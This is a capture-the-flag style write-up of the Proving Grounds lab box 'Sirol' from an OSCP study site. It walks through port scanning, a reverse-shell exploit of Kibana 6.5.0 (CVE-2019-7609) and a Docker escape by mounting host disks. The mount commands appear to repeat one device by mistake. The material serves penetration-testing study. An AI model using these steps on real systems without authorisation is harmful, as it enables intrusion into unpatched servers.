📚
OSCP
  • Pentesting
  • Proving Grounds practice
    • Warm up
      • Windows
        • Kevin
        • Internal
        • Metallus
      • Linux
        • ClamAV
        • Exfiltrated
        • Twiggy
    • Get to work
      • Windows
        • Slort
        • Billyboss
        • Fish
        • UT99
        • AuthBy
        • Jacko
        • Shenzi
      • Linux
        • Dibble
        • Pelican
        • Sorcerer
        • Zino
        • Zenphoto
        • Snookums
        • Nibbles
        • Chatty
        • Banzai
    • Try harder
      • Windows
        • Meathead
      • Linux
        • Sirol
        • Peppo
        • Clyde
  • Buffer overflow
    • Buffer Overflow Methodology
    • TryHackMe Practice
      • Overflow1
      • Overflow2
      • Overflow3
      • Overflow4
      • Overflow5
      • Overflow6
      • Overflow7
      • Overflow8
      • Overflow9
      • Overflow10
  • Active Directory
    • AD Authentication
      • NTLM Authentication
      • Kerberos Authentication
    • TryHackMe Practice
      • Attacktive Directory
      • Roasted
      • RazorBlack
    • PG Practice
      • Hutch
      • Vault
      • Heist
Powered by GitBook
On this page
  • Information Gathering
  • Service Enumeration
  • Kibana (Port 5601)
  • Exploit
  • Privesc

Was this helpful?

  1. Proving Grounds practice
  2. Try harder
  3. Linux

Sirol

Writeup for Sirol from offsec Proving Grounds

PreviousLinuxNextPeppo

Last updated 3 years ago

Was this helpful?

Information Gathering

rustscan -a 192.168.241.54 --ulimit 5000

nmap -sC -sV --reason -p22,80,3306,5601,24007 192.168.241.54

Service Enumeration

Kibana (Port 5601)

Under the Management tab, we can find the version number of Kibana that is running.

Exploit

Kibana Version 6.5.0 contains an arbitrary code execution flaw in the Timelion visualizer.

Payload: python CVE-2019-7609-kibana-rce.py -u http://192.168.241.54:5601/ -host 192.168.49.241 -port 12345 --shell

Privesc

While we are already the root user, the root directory doesn't seem to have what we are looking for.

Notice that when we list the contents in the root directory, there is a .dockerenv file. This along with the fact that our hostname is a bunch of alphanumeric characters would likely indicate that we are in a docker container.

Using the command fdisk -l we can see what other disks are there.

We can then create a directory and mount all other disks.

mkdir /mnt/sda1
mkdir /mnt/sda2
mkdir /mnt/sda5

mount /dev/sda1 /mnt/sda1
mount /dev/sda1 /mnt/sda2
mount /dev/sda1 /mnt/sda5
LogoGitHub - LandGrey/CVE-2019-7609: exploit CVE-2019-7609(kibana RCE) on right way by python2 scriptsGitHub